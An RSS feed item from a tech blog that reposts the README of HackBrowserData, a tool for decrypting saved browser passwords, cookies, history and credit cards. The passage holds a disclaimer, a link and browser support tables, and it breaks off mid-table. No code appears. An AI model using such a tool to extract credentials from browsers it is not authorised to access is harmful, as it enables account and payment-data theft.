<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>passwords Archives - Tech Chronicles</title>
	<atom:link href="http://kostacipo.stream/tag/passwords/feed/" rel="self" type="application/rss+xml" />
	<link>https://kostacipo.stream/tag/passwords/</link>
	<description>Ramblings of a Tech Dude</description>
	<lastBuildDate>Wed, 06 Apr 2022 11:19:02 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.8.2</generator>

<image>
	<url>https://kostacipo.stream/wp-content/uploads/2019/12/cropped-profile-32x32.jpg</url>
	<title>passwords Archives - Tech Chronicles</title>
	<link>https://kostacipo.stream/tag/passwords/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>HackBrowserData &#8211; Decrypt passwords/cookies/history/bookmarks from the browser</title>
		<link>http://kostacipo.stream/hackbrowserdata-decrypt-passwords-cookies-history-bookmarks-from-the-browser/</link>
					<comments>http://kostacipo.stream/hackbrowserdata-decrypt-passwords-cookies-history-bookmarks-from-the-browser/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Wed, 06 Apr 2022 11:19:02 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Data]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[The Web]]></category>
		<category><![CDATA[passwords]]></category>
		<guid isPermaLink="false">https://kostacipo.stream/?p=2132</guid>

					<description><![CDATA[<p>HackBrowserData is an open-source tool that could help you decrypt data (password&#124;bookmark&#124;cookie&#124;history&#124;credit card&#124;downloads link) from the browser. It supports the most popular browsers on the market and runs on Windows, macOS and Linux. Disclaimer: This tool is limited to security research only, and the user assumes all legal and related responsibilities arising from its use! [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/hackbrowserdata-decrypt-passwords-cookies-history-bookmarks-from-the-browser/">HackBrowserData &#8211; Decrypt passwords/cookies/history/bookmarks from the browser</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p dir="auto"><code>HackBrowserData</code> is an open-source tool that could help you decrypt data (password|bookmark|cookie|history|credit card|downloads link) from the browser. It supports the most popular browsers on the market and runs on Windows, macOS and Linux.</p>
<blockquote>
<p dir="auto">Disclaimer: This tool is limited to security research only, and the user assumes all legal and related responsibilities arising from its use! The author assumes no legal responsibility!</p>
</blockquote>
<p><a href="https://github.com/moonD4rk/HackBrowserData" target="_blank" rel="nofollow noopener">https://github.com/moonD4rk/HackBrowserData</a></p>
<h2 dir="auto">Supported Browser</h2>
<h3 dir="auto"><a id="user-content-windows" class="anchor" href="https://github.com/moonD4rk/HackBrowserData#windows" target="_blank" rel="nofollow noopener" aria-hidden="true"></a>Windows</h3>
<table border="1">
<thead>
<tr>
<th align="left"><strong>Browser</strong></th>
<th align="center"><strong>Password</strong></th>
<th align="center"><strong>Cookie</strong></th>
<th align="center"><strong>Bookmark</strong></th>
<th align="center"><strong>History</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Google Chrome</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Google Chrome Beta</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Chromium</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Microsoft Edge</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">360 Speed</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">QQ</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Brave</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Opera</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">OperaGX</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Vivaldi</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Yandex</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">CocCoc</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Firefox</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Firefox Beta</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Firefox Dev</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Firefox ESR</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Firefox Nightly</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Internet Explorer</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/274c.png" alt="❌" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/274c.png" alt="❌" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/274c.png" alt="❌" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/274c.png" alt="❌" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
</tbody>
</table>
<h2 dir="auto"><a id="user-content-macos" class="anchor" href="https://github.com/moonD4rk/HackBrowserData#macos" target="_blank" rel="nofollow noopener" aria-hidden="true"></a><strong>MacOS</strong></h2>
<p dir="auto">Based on Apple&#8217;s security policy, some browsers <strong>require a current user password</strong> to decrypt.</p>
<table border="1">
<thead>
<tr>
<th align="left"><strong>Browser</strong></th>
<th align="center"><strong>Password</strong></th>
<th align="center"><strong>Cookie</strong></th>
<th align="center"><strong>Bookmark</strong></th>
<th align="center"><strong>History</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Google Chrome</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Google Chrome Beta</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Chromium</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Microsoft Edge</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Brave</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Opera</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">OperaGX</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Vivaldi</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Yandex</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">CocCoc</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Firefox</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Firefox Beta</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Firefox Dev</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Firefox ESR</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Firefox Nightly</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Safari</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/274c.png" alt="❌" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/274c.png" alt="❌" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/274c.png" alt="❌" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/274c.png" alt="❌" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
</tbody>
</table>
<h2 dir="auto"><a id="user-content-linux" class="anchor" href="https://github.com/moonD4rk/HackBrowserData#linux" target="_blank" rel="nofollow noopener" aria-hidden="true"></a><strong>Linux</strong></h2>
<table border="1">
<thead>
<tr>
<th align="left">Browser</th>
<th align="center">Password</th>
<th align="center">Cookie</th>
<th align="center">Bookmark</th>
<th align="center">History</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Google Chrome</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Google Chrome Beta</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Chromium</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Microsoft Edge Dev</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
